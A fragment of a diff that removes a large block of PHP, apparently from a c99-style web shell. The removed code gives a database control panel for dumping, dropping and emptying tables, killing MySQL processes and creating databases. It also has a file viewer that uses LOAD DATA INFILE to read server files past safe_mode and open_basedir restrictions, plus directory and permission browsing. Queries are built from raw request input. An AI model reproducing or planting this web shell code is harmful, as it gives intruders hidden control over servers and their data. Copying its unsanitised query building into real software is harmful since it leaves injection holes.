-   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

-

-   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}

-

-   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}

-

-   elseif ($sql_tbl_act == "insert")

-

-   {

-

-    if ($sql_tbl_insert_radio == 1)

-

-    {

-

-     $keys = "";

-

-     $akeys = array_keys($sql_tbl_insert);

-

-     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}

-

-     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}

-

-     $values = "";

-

-     $i = 0;

-

-     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}

-

-     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}

-

-     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";

-

-     $sql_act = "query";

-

-     $sql_tbl_act = "browse";

-

-    }

-

-    elseif ($sql_tbl_insert_radio == 2)

-

-    {

-

-     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);

-

-     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";

-

-     $result = mysql_query($sql_query) or print(mysql_smarterror());

-

-     $result = mysql_fetch_array($result, MYSQL_ASSOC);

-

-     $sql_act = "query";

-

-     $sql_tbl_act = "browse";

-

-    }

-

-   }

-

-   if ($sql_act == "query")

-

-   {

-

-    echo "<hr size=\"1\" noshade>";

-

-    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}

-

-    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}

-

-    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}

-

-   }

-

-   if (in_array($sql_act,$acts))

-

-   {

-

-    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php

-

-    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}

-

-    if ($sql_act == "newtbl")

-

-    {

-

-     echo "<b>";

-

-     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";

-

-    }

-

-    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}

-

-   }

-

-   elseif ($sql_act == "dump")

-

-   {

-

-    if (empty($submit))

-

-    {

-

-     $diplay = FALSE;

-

-     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";

-

-     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";

-

-     $v = join (";",$dmptbls);

-

-     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";

-

-     if ($dump_file) {$tmp = $dump_file;}

-

-     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}

-

-     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";

-

-     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";

-

-     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";

-

-     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";

-

-     echo "</form>";

-

-    }

-

-    else

-

-    {

-

-     $diplay = TRUE;

-

-     $set = array();

-

-     $set["sock"] = $sql_sock;

-

-     $set["db"] = $sql_db;

-

-     $dump_out = "download";

-

-     $set["print"] = 0;

-

-     $set["nl2br"] = 0;

-

-     $set[""] = 0;

-

-     $set["file"] = $dump_file;

-

-     $set["add_drop"] = TRUE;

-

-     $set["onlytabs"] = array();

-

-     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}

-

-     $ret = mysql_dump($set);

-

-     if ($sql_dump_download)

-

-     {

-

-      @ob_clean();

-

-      header("Content-type: application/octet-stream");

-

-      header("Content-length: ".strlen($ret));

-

-      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");

-

-      echo $ret;

-

-      exit;

-

-     }

-

-     elseif ($sql_dump_savetofile)

-

-     {

-

-      $fp = fopen($sql_dump_file,"w");

-

-      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}

-

-      else

-

-      {

-

-       fwrite($fp,$ret);

-

-       fclose($fp);

-

-       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";

-

-      }

-

-     }

-

-     else {echo "<b>Dump: nothing to do!</b>";}

-

-    }

-

-   }

-

-   if ($diplay)

-

-   {

-

-    if (!empty($sql_tbl))

-

-    {

-

-     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}

-

-     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");

-

-     $count_row = mysql_fetch_array($count);

-

-     mysql_free_result($count);

-

-     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");

-

-     $tbl_struct_fields = array();

-

-     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}

-

-     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}

-

-     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}

-

-     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}

-

-     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}

-

-     $perpage = $sql_tbl_le - $sql_tbl_ls;

-

-     if (!is_numeric($perpage)) {$perpage = 10;}

-

-     $numpages = $count_row[0]/$perpage;

-

-     $e = explode(" ",$sql_order);

-

-     if (count($e) == 2)

-

-     {

-

-      if ($e[0] == "d") {$asc_desc = "DESC";}

-

-      else {$asc_desc = "ASC";}

-

-      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";

-

-     }

-

-     else {$v = "";}

-

-     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";

-

-     $result = mysql_query($query) or print(mysql_smarterror());

-

-     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";

-

-     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";

-

-     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";

-

-     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";

-

-     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";

-

-     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}

-

-     if ($sql_tbl_act == "insert")

-

-     {

-

-      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}

-

-      if (!empty($sql_tbl_insert_radio))

-

-      {

-

-

-

-      }

-

-      else

-

-      {

-

-       echo "<br><br><b>Inserting row into table:</b><br>";

-

-       if (!empty($sql_tbl_insert_q))

-

-       {

-

-        $sql_query = "SELECT * FROM `".$sql_tbl."`";

-

-        $sql_query .= " WHERE".$sql_tbl_insert_q;

-

-        $sql_query .= " LIMIT 1;";

-

-        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());

-

-        $values = mysql_fetch_assoc($result);

-

-        mysql_free_result($result);

-

-       }

-

-       else {$values = array();}

-

-       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";

-

-       foreach ($tbl_struct_fields as $field)

-

-       {

-

-        $name = $field["Field"];

-

-        if (empty($sql_tbl_insert_q)) {$v = "";}

-

-        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";

-

-        $i++;

-

-       }

-

-       echo "</table><br>";

-

-       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";

-

-       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}

-

-       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";

-

-      }

-

-     }

-

-     if ($sql_tbl_act == "browse")

-

-     {

-

-      $sql_tbl_ls = abs($sql_tbl_ls);

-

-      $sql_tbl_le = abs($sql_tbl_le);

-

-      echo "<hr size=\"1\" noshade>";

-

-      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";

-

-      $b = 0;

-

-      for($i=0;$i<$numpages;$i++)

-

-      {

-

-       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}

-

-       echo $i;

-

-       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}

-

-       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}

-

-       else {echo "&nbsp;";}

-

-      }

-

-      if ($i == 0) {echo "empty";}

-

-      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";

-

-      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1>";

-

-      echo "<tr>";

-

-      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";

-

-      for ($i=0;$i<mysql_num_fields($result);$i++)

-

-      {

-

-       $v = mysql_field_name($result,$i);

-

-       if ($e[0] == "a") {$s = "d"; $m = "asc";}

-

-       else {$s = "a"; $m = "desc";}

-

-       echo "<td>";

-

-       if (empty($e[0])) {$e[0] = "a";}

-

-       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}

-

-       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}

-

-       echo "</td>";

-

-      }

-

-      echo "<td><font color=\"green\"><b>Action</b></font></td>";

-

-      echo "</tr>";

-

-      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))

-

-      {

-

-       echo "<tr>";

-

-       $w = "";

-

-       $i = 0;

-

-       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}

-

-       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}

-

-       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";

-

-       $i = 0;

-

-       foreach ($row as $k=>$v)

-

-       {

-

-        $v = htmlspecialchars($v);

-

-        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}

-

-        echo "<td>".$v."</td>";

-

-        $i++;

-

-       }

-

-       echo "<td>";

-

-       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";

-

-       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";

-

-       echo "</td>";

-

-       echo "</tr>";

-

-      }

-

-      mysql_free_result($result);

-

-      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";

-

-      echo "<option value=\"\">With selected:</option>";

-

-      echo "<option value=\"deleterow\">Delete</option>";

-

-      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";

-

-     }

-

-    }

-

-    else

-

-    {

-

-     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);

-

-     if (!$result) {echo mysql_smarterror();}

-

-     else

-

-     {

-

-      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";

-

-      

-

-      $i = 0;

-

-      $tsize = $trows = 0;

-

-      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))

-

-      {

-

-       $tsize += $row["Data_length"];

-

-       $trows += $row["Rows"];

-

-       $size = view_size($row["Data_length"]);

-

-       echo "<tr>";

-

-       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";

-

-       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";

-

-       echo "<td>".$row["Rows"]."</td>";

-

-       echo "<td>".$row["Type"]."</td>";

-

-       echo "<td>".$row["Create_time"]."</td>";

-

-       echo "<td>".$row["Update_time"]."</td>";

-

-       echo "<td>".$size."</td>";

-

-       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";

-

-       echo "</tr>";

-

-       $i++;

-

-      }

-

-      echo "<tr bgcolor=\"000000\">";

-

-      echo "<td><center><b>»</b></center></td>";

-

-      echo "<td><center><b>".$i." table(s)</b></center></td>";

-

-      echo "<td><b>".$trows."</b></td>";

-

-      echo "<td>".$row[1]."</td>";

-

-      echo "<td>".$row[10]."</td>";

-

-      echo "<td>".$row[11]."</td>";

-

-      echo "<td><b>".view_size($tsize)."</b></td>";

-

-      echo "<td></td>";

-

-      echo "</tr>";

-

-      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";

-

-      echo "<option value=\"\">With selected:</option>";

-

-      echo "<option value=\"tbldrop\">Drop</option>";

-

-      echo "<option value=\"tblempty\">Empty</option>";

-

-      echo "<option value=\"tbldump\">Dump</option>";

-

-      echo "<option value=\"tblcheck\">Check table</option>";

-

-      echo "<option value=\"tbloptimize\">Optimize table</option>";

-

-      echo "<option value=\"tblrepair\">Repair table</option>";

-

-      echo "<option value=\"tblanalyze\">Analyze table</option>";

-

-      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";

-

-      mysql_free_result($result);

-

-     }

-

-    }

-

-   }

-

-   }

-

-  }

-

-  else

-

-  {

-

-   $acts = array("","newdb","serverstatus","servervars","processes","getfile");

-

-   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }

-

-   if (!empty($sql_act))

-

-   {

-

-    echo "<hr size=\"1\" noshade>";

-

-    if ($sql_act == "newdb")

-

-    {

-

-     echo "<b>";

-

-     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}

-

-     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}

-

-    }

-

-    if ($sql_act == "serverstatus")

-

-    {

-

-     $result = mysql_query("SHOW STATUS", $sql_sock);

-

-     echo "<center><b>Server-status variables:</b><br><br>";

-

-     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#15354c borderColorLight=#15354c border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";

-

-     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}

-

-     echo "</table></center>";

-

-     mysql_free_result($result);

-

-    }

-

-    if ($sql_act == "servervars")

-

-    {

-

-     $result = mysql_query("SHOW VARIABLES", $sql_sock);

-

-     echo "<center><b>Server variables:</b><br><br>";

-

-     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#15354c borderColorLight=#15354c border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";

-

-     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}

-

-     echo "</table>";

-

-     mysql_free_result($result);

-

-    }

-

-    if ($sql_act == "processes")

-

-    {

-

-     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}

-

-     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);

-

-     echo "<center><b>Processes:</b><br><br>";

-

-     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#15354c borderColorLight=#15354c border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";

-

-     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}

-

-     echo "</table>";

-

-     mysql_free_result($result);

-

-    }

-

-    if ($sql_act == "getfile")

-

-    {

-

-     $tmpdb = $sql_login."_tmpdb";

-

-     $select = mysql_select_db($tmpdb);

-

-     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}

-

-     if ($select)

-

-     {

-

-      $created = FALSE;

-

-      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");

-

-      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");

-

-      $result = mysql_query("SELECT * FROM tmp_file;");

-

-      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}

-

-      else

-

-      {

-

-       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}

-

-       $f = "";

-

-       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}

-

-       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}

-

-       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}

-

-       mysql_free_result($result);

-

-       mysql_query("DROP TABLE tmp_file;");

-

-      }

-

-     }

-

-     mysql_drop_db($tmpdb); //comment it if you want to leave database

-

-    }

-

-   }

-

-  }

-

- }

-

- echo "</td></tr></table>";

-

- if ($sql_sock)

-

- {

-

-  $affected = @mysql_affected_rows($sql_sock);

-

-  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}

-

-  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";

-

- }

-

- echo "</table>";

-

-}

-

-if ($act == "mkdir")

-{

-

- if ($mkdir != $d)

- {

-

-  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}

-

-  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}

-

-  echo "<br><br>";

-

- }

-

- $act = $dspact = "ls";

-

-}

-

-if ($act == "d")

-

-{

-

- if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}

-

- else

-

- {

-

-  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";

-

-  if (!$win)

-

-  {

-

-   echo "<tr><td><b>Owner/Group</b></td><td> ";

-

-   $ow = posix_getpwuid(fileowner($d));

-

-   $gr = posix_getgrgid(filegroup($d));

-

-   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));

-

-  }

-

-  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";

-

- }

-

-}

-

-

-if ($act == "security")

-{

-

